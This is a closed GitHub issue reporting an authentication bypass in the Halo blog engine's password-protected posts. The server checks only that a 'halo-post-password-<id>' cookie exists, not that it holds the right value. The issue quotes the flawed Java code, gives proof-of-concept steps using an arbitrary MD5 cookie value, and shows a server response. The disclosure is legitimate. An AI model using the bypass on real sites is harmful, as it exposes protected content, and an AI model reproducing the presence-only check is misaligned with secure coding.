Closed
Description
我确定我已经查看了 (标注[ ]为[x])
我要申请 (标注[ ]为[x])
- BUG 反馈
- 添加新的特性或者功能
- 请求技术支持
The password accessing the article is flawed. The code only verifies the "halo-post-password-" + post.getPostId() in the cookie, but it does not verify that the password is correct.
//判断文章是否有加密
if (StrUtil.isNotEmpty(post.getPostPassword())) {
Cookie cookie = ServletUtil.getCookie(request, "halo-post-password-" + post.getPostId());
if (null == cookie) {
post.setPostSummary("该文章为加密文章");
post.setPostContent("<form id=\"postPasswordForm\" method=\"post\" action=\"/archives/verifyPostPassword\"><p>该文章为加密文章,输入正确的密码即可访问。</p><input type=\"hidden\" id=\"postId\" name=\"postId\" value=\"" + post.getPostId() + "\"> <input type=\"password\" id=\"postPassword\" name=\"postPassword\"> <input type=\"submit\" id=\"passwordSubmit\" value=\"提交\"></form>");
}
}
model.addAttribute("post", post);
return this.render("post");
}
Send the postId to the server by entering the wrong password, and then add the cookie "halo-post-password-4027 (current article id) = 96e79218965eb72c92a549dd5a330112 (any md5 encrypted string)" to access the encrypted article content.
HTTP/1.1 302 Found
Server: nginx/1.15.8
Date: Thu, 04 Apr 2019 15:02:04 GMT
Content-Length: 0
Connection: close
Location: https://demo.halo.run/archives/1554388726735
Content-Language: zh-CN
Set-Cookie: halo-post-password-4032=96e79218965eb72c92a549dd5a330112
Strict-Transport-Security: max-age=31536000
